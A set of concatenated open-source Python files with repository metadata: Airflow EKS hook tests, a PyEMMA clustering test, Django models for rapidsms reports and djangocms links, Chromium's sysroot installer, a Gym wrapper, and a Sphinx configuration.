raised_exception=raised_exception,
)
def test_describe_fargate_profile_throws_exception_when_profile_not_found(
self, fargate_profile_builder
) -> None:
client, generated_test_data = fargate_profile_builder()
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = FARGATE_PROFILE_NOT_FOUND_MSG.format(
fargateProfileName=generated_test_data.nonexistent_fargate_profile_name,
)
with pytest.raises(ClientError) as raised_exception:
client.describe_fargate_profile(
clusterName=generated_test_data.cluster_name,
fargateProfileName=generated_test_data.nonexistent_fargate_profile_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_delete_fargate_profile_removes_deleted_fargate_profile(
self, fargate_profile_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = fargate_profile_builder(initial_batch_size)
eks_hook.delete_fargate_profile(
clusterName=generated_test_data.cluster_name,
fargateProfileName=generated_test_data.existing_fargate_profile_name,
)
result_fargate_profile_list: list = eks_hook.list_fargate_profiles(
clusterName=generated_test_data.cluster_name
)
assert len(result_fargate_profile_list) == (initial_batch_size - 1)
assert generated_test_data.existing_fargate_profile_name not in result_fargate_profile_list
def test_delete_fargate_profile_returns_deleted_fargate_profile(
self, fargate_profile_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = fargate_profile_builder(count=initial_batch_size, minimal=False)
result: dict = eks_hook.delete_fargate_profile(
clusterName=generated_test_data.cluster_name,
fargateProfileName=generated_test_data.existing_fargate_profile_name,
)[ResponseAttributes.FARGATE_PROFILE]
for key, expected_value in generated_test_data.attributes_to_test:
assert result[key] == expected_value
def test_delete_fargate_profile_throws_exception_when_cluster_not_found(
self, fargate_profile_builder
) -> None:
eks_hook, generated_test_data = fargate_profile_builder()
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = CLUSTER_NOT_FOUND_MSG.format(
clusterName=generated_test_data.nonexistent_cluster_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.delete_fargate_profile(
clusterName=generated_test_data.nonexistent_cluster_name,
fargateProfileName=generated_test_data.existing_fargate_profile_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
def test_delete_fargate_profile_throws_exception_when_fargate_profile_not_found(
self, fargate_profile_builder, initial_batch_size: int = BatchCountSize.SMALL
) -> None:
eks_hook, generated_test_data = fargate_profile_builder(count=initial_batch_size)
expected_exception: type[AWSError] = ResourceNotFoundException
expected_msg: str = FARGATE_PROFILE_NOT_FOUND_MSG.format(
fargateProfileName=generated_test_data.nonexistent_fargate_profile_name,
)
with pytest.raises(ClientError) as raised_exception:
eks_hook.delete_fargate_profile(
clusterName=generated_test_data.cluster_name,
fargateProfileName=generated_test_data.nonexistent_fargate_profile_name,
)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_msg,
raised_exception=raised_exception,
)
        # Verify no Fargate profile was deleted.
fargate_profile_count_after_test: int = len(
eks_hook.list_fargate_profiles(clusterName=generated_test_data.cluster_name)
)
assert fargate_profile_count_after_test == initial_batch_size
# The following Selector test cases have all been verified against the AWS API using cURL.
selector_formatting_test_cases = [
# Format is ([Selector(s), expected_message, expected_result])
# Happy Paths
# Selector with a Namespace and no Labels
(
[{FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE}],
None,
PossibleTestResults.SUCCESS,
),
# Selector with a Namespace and an empty collection of Labels
(
[
{
FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE,
FargateProfileAttributes.LABELS: generate_dict("label", 0),
}
],
None,
PossibleTestResults.SUCCESS,
),
# Selector with a Namespace and one valid Label
(
[
{
FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE,
FargateProfileAttributes.LABELS: generate_dict("label", 1),
}
],
None,
PossibleTestResults.SUCCESS,
),
# Selector with a Namespace and the maximum number of Labels
(
[
{
FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE,
FargateProfileAttributes.LABELS: generate_dict("label", MAX_FARGATE_LABELS),
}
],
None,
PossibleTestResults.SUCCESS,
),
# Two valid Selectors
(
[
{FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE},
{FargateProfileAttributes.NAMESPACE: f"{DEFAULT_NAMESPACE}_2"},
],
None,
PossibleTestResults.SUCCESS,
),
# Unhappy Cases
# No Selectors provided
([], FARGATE_PROFILE_NEEDS_SELECTOR_MSG, PossibleTestResults.FAILURE),
# Empty Selector / Selector without a Namespace or Labels
([{}], FARGATE_PROFILE_SELECTOR_NEEDS_NAMESPACE, PossibleTestResults.FAILURE),
# Selector with labels but no Namespace
(
[{FargateProfileAttributes.LABELS: generate_dict("label", 1)}],
FARGATE_PROFILE_SELECTOR_NEEDS_NAMESPACE,
PossibleTestResults.FAILURE,
),
# Selector with Namespace but too many Labels
(
[
{
FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE,
FargateProfileAttributes.LABELS: generate_dict("label", MAX_FARGATE_LABELS + 1),
}
],
FARGATE_PROFILE_TOO_MANY_LABELS,
PossibleTestResults.FAILURE,
),
# Valid Selector followed by Empty Selector
(
[{FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE}, {}],
FARGATE_PROFILE_SELECTOR_NEEDS_NAMESPACE,
PossibleTestResults.FAILURE,
),
# Empty Selector followed by Valid Selector
(
[{}, {FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE}],
FARGATE_PROFILE_SELECTOR_NEEDS_NAMESPACE,
PossibleTestResults.FAILURE,
),
# Empty Selector followed by Empty Selector
([{}, {}], FARGATE_PROFILE_SELECTOR_NEEDS_NAMESPACE, PossibleTestResults.FAILURE),
# Valid Selector followed by Selector with Namespace but too many Labels
(
[
{FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE},
{
FargateProfileAttributes.NAMESPACE: DEFAULT_NAMESPACE,
FargateProfileAttributes.LABELS: generate_dict("label", MAX_FARGATE_LABELS + 1),
},
],
FARGATE_PROFILE_TOO_MANY_LABELS,
PossibleTestResults.FAILURE,
),
]
@pytest.mark.parametrize(
"selectors, expected_message, expected_result",
selector_formatting_test_cases,
)
@mock_eks
def test_create_fargate_selectors(self, cluster_builder, selectors, expected_message, expected_result):
client, generated_test_data = cluster_builder()
cluster_name: str = generated_test_data.existing_cluster_name
fargate_profile_name: str = NON_EXISTING_FARGATE_PROFILE_NAME
expected_exception: type[AWSError] = InvalidParameterException
test_inputs = dict(
deepcopy(
# Required Constants
[POD_EXECUTION_ROLE_ARN]
# Required Variables
+ [
(ClusterAttributes.CLUSTER_NAME, cluster_name),
(FargateProfileAttributes.FARGATE_PROFILE_NAME, fargate_profile_name),
]
# Test Case Values
+ [(FargateProfileAttributes.SELECTORS, selectors)]
)
)
if expected_result == PossibleTestResults.SUCCESS:
result: list = client.create_fargate_profile(**test_inputs)[ResponseAttributes.FARGATE_PROFILE]
for key, expected_value in test_inputs.items():
assert result[key] == expected_value
else:
with pytest.raises(ClientError) as raised_exception:
client.create_fargate_profile(**test_inputs)
assert_client_error_exception_thrown(
expected_exception=expected_exception,
expected_msg=expected_message,
raised_exception=raised_exception,
)
class TestEksHook:
@mock.patch("airflow.providers.amazon.aws.hooks.base_aws.AwsBaseHook.conn")
@pytest.mark.parametrize(
"aws_conn_id, region_name, expected_args",
[
[
"test-id",
"test-region",
[
"-m",
"airflow.providers.amazon.aws.utils.eks_get_token",
"--region-name",
"test-region",
"--aws-conn-id",
"test-id",
"--cluster-name",
"test-cluster",
],
],
[
None,
"test-region",
[
"-m",
"airflow.providers.amazon.aws.utils.eks_get_token",
"--region-name",
"test-region",
"--cluster-name",
"test-cluster",
],
],
[
None,
None,
["-m", "airflow.providers.amazon.aws.utils.eks_get_token", "--cluster-name", "test-cluster"],
],
],
)
def test_generate_config_file(self, mock_conn, aws_conn_id, region_name, expected_args):
mock_conn.describe_cluster.return_value = {
"cluster": {"certificateAuthority": {"data": "test-cert"}, "endpoint": "test-endpoint"}
}
hook = EksHook(aws_conn_id=aws_conn_id, region_name=region_name)
# We're mocking all actual AWS calls and don't need a connection. This
# avoids an Airflow warning about connection cannot be found.
hook.get_connection = lambda _: None
with hook.generate_config_file(
eks_cluster_name="test-cluster", pod_namespace="k8s-namespace"
) as config_file:
config = yaml.safe_load(Path(config_file).read_text())
assert config == {
"apiVersion": "v1",
"kind": "Config",
"clusters": [
{
"cluster": {"server": "test-endpoint", "certificate-authority-data": "test-cert"},
"name": "test-cluster",
}
],
"contexts": [
{
"context": {"cluster": "test-cluster", "namespace": "k8s-namespace", "user": "aws"},
"name": "aws",
}
],
"current-context": "aws",
"preferences": {},
"users": [
{
"name": "aws",
"user": {
"exec": {
"apiVersion": "client.authentication.k8s.io/v1alpha1",
"args": expected_args,
"command": sys.executable,
"env": [{"name": "AIRFLOW__LOGGING__LOGGING_LEVEL", "value": "FATAL"}],
"interactiveMode": "Never",
}
},
}
],
}
@mock.patch("airflow.providers.amazon.aws.hooks.eks.RequestSigner")
@mock.patch("airflow.providers.amazon.aws.hooks.base_aws.AwsBaseHook.conn")
@mock.patch("airflow.providers.amazon.aws.hooks.base_aws.AwsBaseHook.get_session")
def test_fetch_access_token_for_cluster(self, mock_get_session, mock_conn, mock_signer):
mock_signer.return_value.generate_presigned_url.return_value = "http://example.com"
mock_get_session.return_value.region_name = "us-east-1"
hook = EksHook()
token = hook.fetch_access_token_for_cluster(eks_cluster_name="test-cluster")
mock_signer.assert_called_once_with(
service_id=mock_conn.meta.service_model.service_id,
region_name="us-east-1",
signing_name="sts",
signature_version="v4",
credentials=mock_get_session.return_value.get_credentials.return_value,
event_emitter=mock_get_session.return_value.events,
)
mock_signer.return_value.generate_presigned_url.assert_called_once_with(
request_dict={
"method": "GET",
"url": "https://sts.us-east-1.amazonaws.com/?Action=GetCallerIdentity&Version=2011-06-15",
"body": {},
"headers": {"x-k8s-aws-id": "test-cluster"},
"context": {},
},
region_name="us-east-1",
expires_in=60,
operation_name="",
)
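        # The expected token is the "k8s-aws-v1." prefix followed by the URL-safe
        # base64 encoding (padding stripped) of the mocked presigned URL
        # "http://example.com", i.e. "aHR0cDovL2V4YW1wbGUuY29t".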
assert token == "k8s-aws-v1.aHR0cDovL2V4YW1wbGUuY29t"
# Helper methods for repeated assert combinations.
def assert_all_arn_values_are_valid(expected_arn_values, pattern, arn_under_test) -> None:
"""
Applies regex `pattern` to `arn_under_test` and asserts
that each group matches the provided expected value.
    A None entry in 'expected_arn_values' asserts only that the corresponding
    value exists, without matching it against a specific value.
"""
findall: list = pattern.findall(arn_under_test)[0]
# findall() returns a list of matches from right to left so it must be reversed
# in order to match the logical order of the 'expected_arn_values' list.
for value in reversed(findall):
expected_value = expected_arn_values.pop()
if expected_value:
assert value in expected_value
else:
assert value
assert region_matches_partition(findall[1], findall[0])
def assert_client_error_exception_thrown(
expected_exception: type[AWSError], expected_msg: str, raised_exception: ExceptionInfo
) -> None:
"""
Asserts that the raised exception is of the expected type
and the resulting message matches the expected format.
"""
response = raised_exception.value.response[ErrorAttributes.ERROR]
assert response[ErrorAttributes.CODE] == expected_exception.TYPE
assert response[ErrorAttributes.MESSAGE] == expected_msg
def assert_result_matches_expected_list(
result: list, expected_result: list, expected_len: int | None = None
) -> None:
assert result == expected_result
assert len(result) == expected_len or len(expected_result)
def assert_is_valid_uri(value: str) -> None:
result: ParseResult = urlsplit(value)
assert all([result.scheme, result.netloc, result.path])
assert REGION in value
|
{
"content_hash": "478935aa2f0f9cc429564f4c0ea73cc8",
"timestamp": "",
"source": "github",
"line_count": 1336,
"max_line_length": 110,
"avg_line_length": 42.92814371257485,
"alnum_prop": 0.6420351513460734,
"repo_name": "apache/airflow",
"id": "3d3e51f94acf7a42a50f15741deadcc985f0b246",
"size": "58139",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "tests/providers/amazon/aws/hooks/test_eks.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "25980"
},
{
"name": "Dockerfile",
"bytes": "71458"
},
{
"name": "HCL",
"bytes": "3786"
},
{
"name": "HTML",
"bytes": "172957"
},
{
"name": "JavaScript",
"bytes": "143915"
},
{
"name": "Jinja",
"bytes": "38911"
},
{
"name": "Jupyter Notebook",
"bytes": "5482"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "23697738"
},
{
"name": "R",
"bytes": "313"
},
{
"name": "Shell",
"bytes": "211306"
},
{
"name": "TypeScript",
"bytes": "521019"
}
],
"symlink_target": ""
}
|
"""
Test the save_trajs function of the coordinates API by comparing
the direct, sequential retrieval of frames via mdtraj.load_frame() vs
the retrieval via save_trajs
@author: gph82, clonker
"""
import unittest
import numpy as np
import pyemma.coordinates as coor
class TestClusterSamples(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(TestClusterSamples, cls).setUpClass()
def setUp(self):
self.input_trajs = [[0,1,2],
[3,4,5],
[6,7,8],
[0,1,2],
[3,4,5],
[6,7,8]]
self.cluster_obj = coor.cluster_regspace(data=self.input_trajs, dmin=.5)
def test_index_states(self):
# Test that the catalogue is being set up properly
        # The assignment-catalogue is easy to see from the above dtrajs
ref = [[[0,0],[3,0]], # appearances of the 1st cluster
[[0,1],[3,1]], # appearances of the 2nd cluster
[[0,2],[3,2]], # appearances of the 3rd cluster
[[1,0],[4,0]], # .....
[[1,1],[4,1]],
[[1,2],[4,2]],
[[2,0],[5,0]],
[[2,1],[5,1]],
[[2,2],[5,2]],
]
for cc in np.arange(self.cluster_obj.n_clusters):
assert np.allclose(self.cluster_obj.index_clusters[cc], ref[cc])
def test_sample_indexes_by_state(self):
samples = self.cluster_obj.sample_indexes_by_cluster(np.arange(self.cluster_obj.n_clusters), 10)
# For each sample, check that you're actually retrieving the i-th center
for ii, isample in enumerate(samples):
assert np.in1d([self.cluster_obj.dtrajs[pair[0]][pair[1]] for pair in isample],ii).all()
if __name__ == "__main__":
unittest.main()
|
{
"content_hash": "644cdb9ef3ef6c7922d6a254d43aa3f7",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 104,
"avg_line_length": 34.425925925925924,
"alnum_prop": 0.5422270037654653,
"repo_name": "arokem/PyEMMA",
"id": "f224ea844bb23cfab3637c45537df49cf44e8b9a",
"size": "3273",
"binary": false,
"copies": "2",
"ref": "refs/heads/devel",
"path": "pyemma/coordinates/tests/test_cluster_samples.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "C",
"bytes": "39352"
},
{
"name": "Python",
"bytes": "1138398"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import datetime
from django.db import models
from healthcare.api import client
from healthcare.exceptions import PatientDoesNotExist, ProviderDoesNotExist
class Report(models.Model):
"""An abstract model describing the structure of a 1000 days report."""
# Meta data.
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
active = models.BooleanField(default=True)
# Information about the IncomingMessage from which the report was received.
# If the report was not generated via SMS, then these fields will be
# empty.
raw_text = models.CharField(max_length=255, null=True, blank=True)
connection = models.ForeignKey('rapidsms.Connection', null=True, blank=True)
# Global identifiers, created by rapidsms-healthcare.
global_provider_id = models.CharField(max_length=255, null=True, blank=True)
global_patient_id = models.CharField(max_length=255, null=True, blank=True)
# In the near future, we will want to incorporate the rapidsms facilities registry.
# The date of the event that the report describes.
data_date = models.DateField(null=True, blank=True, default=datetime.date.today)
class Meta:
abstract = True
ordering = ['-data_date']
def __unicode__(self):
return 'Report created {0}'.format(self.created.date())
def cancel(self, save=True):
"""Cancels this report if it is currently active."""
        self.active = False
if save:
self.save()
@property
def patient(self):
"""Retrieves the patient record associated with this report.
This method returns None if self.global_patient_id is None, or if no
patient exists with the identifier self.global_patient_id.
"""
if not hasattr(self, '_patient'):
if not self.global_patient_id:
self._patient = None
else:
try:
self._patient = client.patients.get(self.global_patient_id)
except PatientDoesNotExist:
self._patient = None
return self._patient
@property
def provider(self):
"""Retrieves the provider record associated with this report.
This method returns None if self.global_provider_id is None, or if no
provider exists with the identifier self.global_provider_id.
"""
if not hasattr(self, '_provider'):
if not self.global_provider_id:
self._provider = None
else:
try:
self._provider = client.providers.get(self.global_provider_id)
except ProviderDoesNotExist:
self._provider = None
return self._provider
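# Illustrative usage with a hypothetical concrete subclass (Report is abstract, so the
# 'BirthReport' model below is an assumption made for the example, not part of this app):
#
#   class BirthReport(Report):
#       pass
#
#   report = BirthReport.objects.create(global_patient_id='abc123')
#   report.patient    # the healthcare patient record, or None if no match is found
#   report.cancel()   # sets active=False and saves the report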
|
{
"content_hash": "67d36b629c4482f07c82930b9cc105e2",
"timestamp": "",
"source": "github",
"line_count": 77,
"max_line_length": 87,
"avg_line_length": 36.63636363636363,
"alnum_prop": 0.6440978376462247,
"repo_name": "caktus/rapidsms-reports",
"id": "95557b9fe2868024e4d0bcd72aa48ccd86d151c0",
"size": "2821",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "reports/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "4871"
}
],
"symlink_target": ""
}
|
"""Install Debian sysroots for building chromium.
"""
# The sysroot is needed to ensure that binaries that get built will run on
# the oldest stable version of Debian that we currently support.
# This script can be run manually but is more often run as part of gclient
# hooks. When run from hooks this script is a no-op on non-linux platforms.
# The sysroot image could be constructed from scratch based on the current state
# of the Debian archive but for consistency we use a pre-built root image (we
# don't want upstream changes to Debian to affect the chromium build until we
# choose to pull them in). The images will normally need to be rebuilt every
# time chrome's build dependencies are changed but should also be updated
# periodically to include upstream security fixes from Debian.
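# Example invocations (illustrative only; the flags are defined in main() below):
#   install-sysroot.py --arch=amd64      install the sysroot for a single architecture
#   install-sysroot.py --all             install sysroot images for every supported arch
#   install-sysroot.py --print-hash=arm  print the sysroot tarball SHA-1 for an arch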
import hashlib
import json
import platform
import optparse
import os
import re
import shutil
import subprocess
import sys
try:
# For Python 3.0 and later
from urllib.request import urlopen
except ImportError:
# Fall back to Python 2's urllib2
  from urllib2 import urlopen
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
URL_PREFIX = 'https://commondatastorage.googleapis.com'
URL_PATH = 'chrome-linux-sysroot/toolchain'
VALID_ARCHS = ('arm', 'arm64', 'i386', 'amd64')
ARCH_TRANSLATIONS = {
'x64': 'amd64',
'x86': 'i386',
}
DEFAULT_TARGET_PLATFORM = 'sid'
class Error(Exception):
pass
def GetSha1(filename):
sha1 = hashlib.sha1()
with open(filename, 'rb') as f:
while True:
# Read in 1mb chunks, so it doesn't all have to be loaded into memory.
chunk = f.read(1024*1024)
if not chunk:
break
sha1.update(chunk)
return sha1.hexdigest()
def main(args):
parser = optparse.OptionParser('usage: %prog [OPTIONS]', description=__doc__)
parser.add_option('--arch',
help='Sysroot architecture: %s' % ', '.join(VALID_ARCHS))
parser.add_option('--all', action='store_true',
help='Install all sysroot images (useful when updating the'
' images)')
parser.add_option('--print-hash',
help='Print the hash of the sysroot for the given arch.')
options, _ = parser.parse_args(args)
if not sys.platform.startswith('linux'):
return 0
if options.print_hash:
arch = options.print_hash
print(GetSysrootDict(DEFAULT_TARGET_PLATFORM,
ARCH_TRANSLATIONS.get(arch, arch))['Sha1Sum'])
return 0
if options.arch:
InstallSysroot(DEFAULT_TARGET_PLATFORM,
ARCH_TRANSLATIONS.get(options.arch, options.arch))
elif options.all:
for arch in VALID_ARCHS:
InstallSysroot(DEFAULT_TARGET_PLATFORM, arch)
else:
    print('You must specify one of the options.')
return 1
return 0
def GetSysrootDict(target_platform, target_arch):
if target_arch not in VALID_ARCHS:
raise Error('Unknown architecture: %s' % target_arch)
sysroots_file = os.path.join(SCRIPT_DIR, 'sysroots.json')
sysroots = json.load(open(sysroots_file))
sysroot_key = '%s_%s' % (target_platform, target_arch)
if sysroot_key not in sysroots:
raise Error('No sysroot for: %s %s' % (target_platform, target_arch))
return sysroots[sysroot_key]
def InstallSysroot(target_platform, target_arch):
sysroot_dict = GetSysrootDict(target_platform, target_arch)
tarball_filename = sysroot_dict['Tarball']
tarball_sha1sum = sysroot_dict['Sha1Sum']
# TODO(thestig) Consider putting this elsewhere to avoid having to recreate
# it on every build.
linux_dir = os.path.dirname(SCRIPT_DIR)
sysroot = os.path.join(linux_dir, sysroot_dict['SysrootDir'])
url = '%s/%s/%s/%s' % (URL_PREFIX, URL_PATH, tarball_sha1sum,
tarball_filename)
stamp = os.path.join(sysroot, '.stamp')
if os.path.exists(stamp):
with open(stamp) as s:
if s.read() == url:
return
print('Installing Debian %s %s root image: %s' % \
(target_platform, target_arch, sysroot))
if os.path.isdir(sysroot):
shutil.rmtree(sysroot)
os.mkdir(sysroot)
tarball = os.path.join(sysroot, tarball_filename)
print('Downloading %s' % url)
sys.stdout.flush()
sys.stderr.flush()
for _ in range(3):
try:
response = urlopen(url)
with open(tarball, "wb") as f:
f.write(response.read())
break
except Exception: # Ignore exceptions.
pass
else:
raise Error('Failed to download %s' % url)
sha1sum = GetSha1(tarball)
if sha1sum != tarball_sha1sum:
    raise Error('Tarball sha1sum is wrong. '
                'Expected %s, actual: %s' % (tarball_sha1sum, sha1sum))
subprocess.check_call(['tar', 'xf', tarball, '-C', sysroot])
os.remove(tarball)
with open(stamp, 'w') as s:
s.write(url)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv[1:]))
except Error as e:
sys.stderr.write(str(e) + '\n')
sys.exit(1)
|
{
"content_hash": "3967d06d9dea8b8a2d92063e6442f3db",
"timestamp": "",
"source": "github",
"line_count": 160,
"max_line_length": 80,
"avg_line_length": 30.7875,
"alnum_prop": 0.669305724725944,
"repo_name": "flutter/buildroot",
"id": "d3e76649e6524dcb9f98b480f08f56d747aba865",
"size": "5118",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "build/linux/sysroot_scripts/install-sysroot.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "507"
},
{
"name": "C++",
"bytes": "30195"
},
{
"name": "Python",
"bytes": "291265"
},
{
"name": "Shell",
"bytes": "85178"
},
{
"name": "sed",
"bytes": "1677"
}
],
"symlink_target": ""
}
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
from cms.models import CMSPlugin, Page
from cms.models.fields import PageField
class Link(CMSPlugin):
"""
A link to an other page or to an external website
"""
name = models.CharField(_("name"), max_length=256)
url = models.URLField(_("link"), blank=True, null=True)
page_link = PageField(
verbose_name=_("page"),
help_text=_("A link to a page has priority over a text link."),
on_delete=models.SET_NULL,
blank=True, null=True)
#page_link = models.ForeignKey(Page, verbose_name=_("page"), blank=True, null=True, help_text=_("A link to a page has priority over a text link."), on_delete=models.SET_NULL)
additional_params = models.CharField(_("additional parameters"), max_length=300, blank=True, null=True)
    mailto = models.EmailField(_("mailto"), blank=True, null=True, help_text=_("An email address has priority over a text link."))
phone = models.CharField(_('Phone'), blank=True, null=True, max_length=40,
help_text=_('A phone number has priority over a mailto link.'))
css = models.CharField(_('CSS Classes'),
default=u'',
blank=True, max_length=100)
target = models.CharField(_("target"), blank=True, max_length=100, choices=((
("", _("same window")),
("_blank", _("new window")),
("_parent", _("parent window")),
("_top", _("topmost frame")),
)))
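    # Resolution order used by link() below: phone > mailto > page_link (plus any
    # additional_params) > url; an empty string is returned when none of these is set.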
def link(self):
if self.phone:
link = u"tel://%s" % self.phone
elif self.mailto:
link = u"mailto:%s" % self.mailto
elif self.page_link:
link = self.page_link.get_absolute_url()
if self.additional_params:
link += self.additional_params
elif self.url:
link = self.url
else:
link = ""
return link
def __unicode__(self):
return self.name
search_fields = ('name',)
|
{
"content_hash": "66e329247e517a23ed511baf4fac06c6",
"timestamp": "",
"source": "github",
"line_count": 52,
"max_line_length": 178,
"avg_line_length": 38.92307692307692,
"alnum_prop": 0.5904150197628458,
"repo_name": "kohout/djangocms-link",
"id": "696f27d275a5957008f0e105c768ff96d6b14151",
"size": "2024",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "djangocms_link/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "350"
},
{
"name": "Python",
"bytes": "49411"
}
],
"symlink_target": ""
}
|
"""Gym utilities."""
from typing import Any
from acme import wrappers
import gym
from rlds_creator import environment
from rlds_creator import gym_renderer
class InfoWrapper(gym.Wrapper):
"""Wrapper that provides access to the information of the last step."""
def __init__(self, env):
super().__init__(env)
self._step_info = None
def reset(self):
self._step_info = None
return super().reset()
def step(self, action):
observation, reward, done, info = super().step(action)
self._step_info = info
return observation, reward, done, info
def step_info(self) -> Any:
"""Returns the auxiliary information of the last step."""
return self._step_info
class GymEnvironment(environment.Environment):
"""An Environment that is backed by a Gym Env."""
def __init__(self, env: gym.Env):
# We wrap the Gym environment to access the step info.
self._gym_env = InfoWrapper(env)
self._env = wrappers.gym_wrapper.GymWrapper(self._gym_env)
self._renderer = gym_renderer.GymRenderer(self._gym_env)
def env(self) -> environment.DMEnv:
return self._env
def render(self) -> environment.Image:
return self._renderer.render()
def step_info(self) -> Any:
return self._gym_env.step_info()
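if __name__ == '__main__':
  # Hedged usage sketch, not part of the module: assumes a registered Gym id
  # such as 'CartPole-v1' and a gym version with the classic 4-tuple step API
  # that InfoWrapper above expects.
  wrapped = GymEnvironment(gym.make('CartPole-v1'))
  dm = wrapped.env()            # dm_env-style interface via Acme's GymWrapper
  dm.reset()
  dm.step(0)                    # an arbitrary valid CartPole action
  print(wrapped.step_info())    # info dict captured from the last Gym step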
|
{
"content_hash": "835de71f1bd81c1c501274d776711a1e",
"timestamp": "",
"source": "github",
"line_count": 48,
"max_line_length": 73,
"avg_line_length": 26.25,
"alnum_prop": 0.6817460317460318,
"repo_name": "google-research/rlds-creator",
"id": "0e6bfe7dfa48b4e75f8d087318eab560119e8417",
"size": "1860",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "rlds_creator/gym_utils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
}
|
import sys, os
sys.path.append('../')
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.append(os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.pngmath']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'BatchOpenMPI'
copyright = u'2009, Antoine Dymond'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.2'
# The full version, including alpha/beta/rc tags.
release = '0.2.2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'BatchOpenMPIdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
